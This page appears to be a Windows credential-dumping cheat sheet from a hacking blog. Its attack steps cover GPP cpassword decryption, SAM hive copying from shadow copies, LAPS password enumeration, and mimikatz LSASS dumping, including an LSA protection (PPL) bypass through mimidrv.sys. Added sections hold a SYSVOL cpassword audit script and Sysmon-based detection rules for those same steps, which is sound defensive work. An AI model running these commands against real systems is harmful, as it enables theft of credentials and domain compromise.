Credential Dumping

cpassword

Groups.xml --- You are less likely to run into this in a modern environment, as this practice was stopped in 2012.

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeX
cpassword
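From the defender's side, the fix for the Groups.xml case above is to find every Group Policy Preference file that still carries a cpassword attribute and remove the entry from the GPO. The following is an added example, not code from the original page or from the gpp-decrypt tool: it walks a SYSVOL-style tree, parses the GPP XML file types that can hold a cpassword (Groups, Services, ScheduledTasks, DataSources, Drives, Printers) and reports each occurrence without decrypting it. The SYSVOL layout, policy GUID and XML contents are constructed samples.

```python
"""Audit a SYSVOL tree for Group Policy Preference files that still carry a
cpassword attribute.

Added example, not part of the original page: it finds and reports the
entries so they can be removed from the GPO; it does not decrypt anything.
The SYSVOL layout and XML below are constructed samples.
"""
from __future__ import annotations

import os
import tempfile
import xml.etree.ElementTree as ET
from dataclasses import dataclass

# GPP XML files whose <Properties> element may carry a cpassword attribute.
GPP_FILES = {"groups.xml", "services.xml", "scheduledtasks.xml",
             "datasources.xml", "drives.xml", "printers.xml"}

# The account attribute differs per file type (userName, accountName, runAs, username).
ACCOUNT_ATTRS = ("userName", "username", "accountName", "runAs")


@dataclass(frozen=True)
class Finding:
    path: str        # file containing the stored credential
    element: str     # parent element tag, e.g. User, NTService, Task
    account: str     # account the stored password belongs to, if named
    cpassword_len: int


def scan_gpp_file(path: str) -> list[Finding]:
    """Return one Finding per <Properties> element with a non-empty cpassword."""
    try:
        root = ET.parse(path).getroot()
    except ET.ParseError:
        return []  # unparsable file: nothing reported here; log it in production
    findings = []
    for parent in root.iter():
        for props in parent.findall("Properties"):
            cpw = props.get("cpassword", "")
            if not cpw:
                continue
            account = next((props.get(a) for a in ACCOUNT_ATTRS if props.get(a)), "")
            findings.append(Finding(path, parent.tag, account, len(cpw)))
    return findings


def scan_sysvol(sysvol_root: str) -> list[Finding]:
    """Walk a SYSVOL-style tree and scan every GPP file that can hold a cpassword."""
    findings = []
    for dirpath, _dirs, files in os.walk(sysvol_root):
        for name in files:
            if name.lower() in GPP_FILES:
                findings.extend(scan_gpp_file(os.path.join(dirpath, name)))
    return findings


# --- constructed sample data (placeholder values, not real cpasswords) -------
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="svc_backup">
    <Properties action="U" userName="svc_backup" neverExpires="1"
                cpassword="CONSTRUCTED-PLACEHOLDER-NOT-A-REAL-CPASSWORD"/>
  </User>
  <User name="helpdesk">
    <Properties action="U" userName="helpdesk" description="no stored password"/>
  </User>
</Groups>
"""

SAMPLE_SERVICES_XML = """<?xml version="1.0" encoding="utf-8"?>
<NTServices>
  <NTService name="ExampleSvc">
    <Properties startupType="Automatic" serviceName="ExampleSvc"
                accountName="CORP\\svc_sql" cpassword="CONSTRUCTED-PLACEHOLDER-2"/>
  </NTService>
</NTServices>
"""


def build_sample_sysvol(base: str) -> str:
    """Create a minimal SYSVOL-like layout under base and return its root."""
    policy = os.path.join(base, "Policies", "{CONSTRUCTED-POLICY-GUID}",
                          "Machine", "Preferences")
    layout = {os.path.join(policy, "Groups", "Groups.xml"): SAMPLE_GROUPS_XML,
              os.path.join(policy, "Services", "Services.xml"): SAMPLE_SERVICES_XML}
    for path, content in layout.items():
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)
    return base


def demo() -> list[Finding]:
    """Build the sample tree in a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_sysvol(build_sample_sysvol(tmp))


if __name__ == "__main__":
    for f in demo():
        print(f"{f.path}: <{f.element}> account={f.account!r} cpassword_len={f.cpassword_len}")
```

Pointing `scan_sysvol` at a mounted `\\domain\SYSVOL\domain` share gives the same report for a live domain; the helpdesk entry in the sample shows that a `<Properties>` element without a cpassword attribute is not reported, and the scan is by file name so a renamed or hand-edited GPP file is still caught as long as it keeps its standard name.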

SAM Database Dump

wmic shadowcopy call create Volume='C:\'
vssadmin list shadows
Shadow Copy of the C:\ Drive
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam C:\users\myhackingblog\sam
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system C:\users\myhackingblog\system
Moving SAM and SYSTEM off of the shadow volume
Downloading SAM and SYSTEM onto Kali
Using creddump7's pwdump to decrypt the SAM database and retrieve the Administrator NTLM hash

Windows Local Administrator Password Solution (LAPS)

Import-Module .\LAPSToolkit.ps1
Get-LAPSComputers
Find-LAPSDelegatedGroups
Get-NetGroupMember -GroupName "LAPS Password Readers"

## Gain access to a user in the LAPS Password Readers group and proceed to dump the password.
runas /noprofile /user:domain\user "powershell -exec bypass"
Import-Module .\LAPSToolkit.ps1
Get-LAPSComputers

LSA Hash Dump (NTLM or Plaintext) Using Mimikatz

mimikatz.exe  ## Run as an administrator
privilege::debug  ## Anything other than '20' likely means you're being blocked or are not admin.
sekurlsa::logonpasswords

The Local Security Authority Subsystem Service (LSASS) can run with Local Security Authority (LSA) protection enabled, which makes it a Protected Process Light (PPL). When this is enabled, not even a process running at SYSTEM integrity can dump logon passwords/hashes.

This setting is the RunAsPPL value under the following registry key and is enforced by a bit in the EPROCESS kernel object.

Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa

Fortunately for us, mimikatz already has a built-in bypass for this. It works by loading its mimidrv.sys driver, which requires already having local Administrator or SYSTEM level permissions: High/SYSTEM integrity is needed to use the SeLoadDriverPrivilege required to load signed drivers.

mimikatz.exe
!+  ## Load the mimidrv.sys driver
!processprotect /process:lsass.exe /remove  ## Clear the PPL flag on lsass.exe
sekurlsa::logonpasswords

It's also possible to retrieve the hashes without running mimikatz on the victim computer: dump the lsass process from Task Manager and open the dump file with mimikatz on an attacker-controlled Windows computer.

sekurlsa::minidump lsass.dmp  ## Point mimikatz at the dump file instead of the live process
sekurlsa::logonpasswords
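Each of the dumping paths on this page leaves a distinct host signal: the shadow-copy SAM/SYSTEM copy shows up as process creation, the mimidrv.sys PPL bypass as a driver load, and both the live `sekurlsa::logonpasswords` and the Task Manager minidump as a handle to lsass.exe with read access (plus a `.DMP` file write in the Task Manager case). The following is an added detection example, not code from the original page or from mimikatz: it runs simple rules over constructed Sysmon-style events (EventID 1 ProcessCreate, 6 DriverLoad, 10 ProcessAccess, 11 FileCreate, real Sysmon field names but invented contents) and covers both the SAM shadow-copy section and the two LSASS sections above. The allow-list path for a legitimate security product is a placeholder.

```python
"""Detection rules for the credential-dumping steps on this page, run over
constructed Sysmon-style events.

Added example, not part of the original page. The events below are
constructed JSON lines using Sysmon field names (EventID 1 ProcessCreate,
6 DriverLoad, 10 ProcessAccess, 11 FileCreate); their contents are invented.
"""
from __future__ import annotations

import json
from dataclasses import dataclass

PROCESS_VM_READ = 0x0010  # access right required to read another process's memory

# Constructed allow-list of security products that legitimately open lsass.exe.
# In a real deployment this comes from your EDR/AV inventory, keyed by image path.
ALLOWED_LSASS_READERS = {r"c:\program files\exampleedr\sensor.exe"}


@dataclass(frozen=True)
class Alert:
    rule: str
    detail: str


def _lower(ev: dict, key: str) -> str:
    return str(ev.get(key, "")).lower()


def detect(ev: dict) -> list[Alert]:
    """Return the alerts a single Sysmon-style event triggers (possibly none)."""
    alerts: list[Alert] = []
    eid = ev.get("EventID")
    if eid == 1:  # ProcessCreate: look at the command line
        cmd = _lower(ev, "CommandLine")
        if "shadowcopy call create" in cmd or (
                "vssadmin" in cmd and ("create shadow" in cmd or "list shadows" in cmd)):
            alerts.append(Alert("shadow_copy", cmd))
        if "harddiskvolumeshadowcopy" in cmd and (
                "\\config\\sam" in cmd or "\\config\\system" in cmd):
            alerts.append(Alert("hive_copy", cmd))
    elif eid == 10:  # ProcessAccess: handle opened to lsass.exe with memory-read rights
        if _lower(ev, "TargetImage").endswith("\\lsass.exe"):
            granted = int(str(ev.get("GrantedAccess", "0x0")), 16)
            source = _lower(ev, "SourceImage")
            if granted & PROCESS_VM_READ and source not in ALLOWED_LSASS_READERS:
                alerts.append(Alert("lsass_access", f"{source} granted {hex(granted)}"))
    elif eid == 6:  # DriverLoad: the PPL bypass needs mimidrv.sys in the kernel
        loaded = _lower(ev, "ImageLoaded")
        if loaded.rsplit("\\", 1)[-1] == "mimidrv.sys":
            alerts.append(Alert("driver_load", loaded))
    elif eid == 11:  # FileCreate: Task Manager writes lsass.DMP to the user's temp dir
        target = _lower(ev, "TargetFilename")
        name = target.rsplit("\\", 1)[-1]
        if name.endswith(".dmp") and "lsass" in name:
            alerts.append(Alert("lsass_dump_file", target))
    return alerts


def run(lines: str) -> list[Alert]:
    """Run detect() over newline-delimited JSON events and collect every alert."""
    alerts: list[Alert] = []
    for line in lines.strip().splitlines():
        if line.strip():
            alerts.extend(detect(json.loads(line)))
    return alerts


# Constructed sample events (JSON lines); raw string so backslashes reach the JSON parser.
SAMPLE_EVENTS = r"""
{"EventID": 1, "Image": "C:\\Windows\\System32\\wbem\\WMIC.exe", "CommandLine": "wmic shadowcopy call create Volume='C:\\'"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\vssadmin.exe", "CommandLine": "vssadmin list shadows"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\windows\\system32\\config\\sam C:\\Users\\CONSTRUCTED\\sam"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "notepad.exe notes.txt"}
{"EventID": 10, "SourceImage": "C:\\Temp\\mimikatz.exe", "TargetImage": "C:\\Windows\\system32\\lsass.exe", "GrantedAccess": "0x1010"}
{"EventID": 10, "SourceImage": "C:\\Windows\\System32\\Taskmgr.exe", "TargetImage": "C:\\Windows\\system32\\lsass.exe", "GrantedAccess": "0x1fffff"}
{"EventID": 10, "SourceImage": "C:\\Program Files\\ExampleEDR\\sensor.exe", "TargetImage": "C:\\Windows\\system32\\lsass.exe", "GrantedAccess": "0x1010"}
{"EventID": 10, "SourceImage": "C:\\Windows\\System32\\svchost.exe", "TargetImage": "C:\\Windows\\system32\\lsass.exe", "GrantedAccess": "0x1000"}
{"EventID": 6, "ImageLoaded": "C:\\Temp\\mimidrv.sys"}
{"EventID": 11, "Image": "C:\\Windows\\System32\\Taskmgr.exe", "TargetFilename": "C:\\Users\\CONSTRUCTED\\AppData\\Local\\Temp\\lsass.DMP"}
"""

if __name__ == "__main__":
    for a in run(SAMPLE_EVENTS):
        print(f"[{a.rule}] {a.detail}")
```

Two design points worth noting. The lsass rule keys on the PROCESS_VM_READ bit rather than on specific masks such as 0x1010 or 0x1fffff, so the svchost.exe event with 0x1000 (query rights only) is not flagged while any read-capable handle from a non-allow-listed image is; tune `ALLOWED_LSASS_READERS` from your own telemetry before deploying. The driver rule matches mimidrv.sys by file name only, which a renamed copy evades; matching on the Sysmon `Hashes` or `Signature` fields, or on the service-install event that accompanies a driver load, is the more durable signal.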
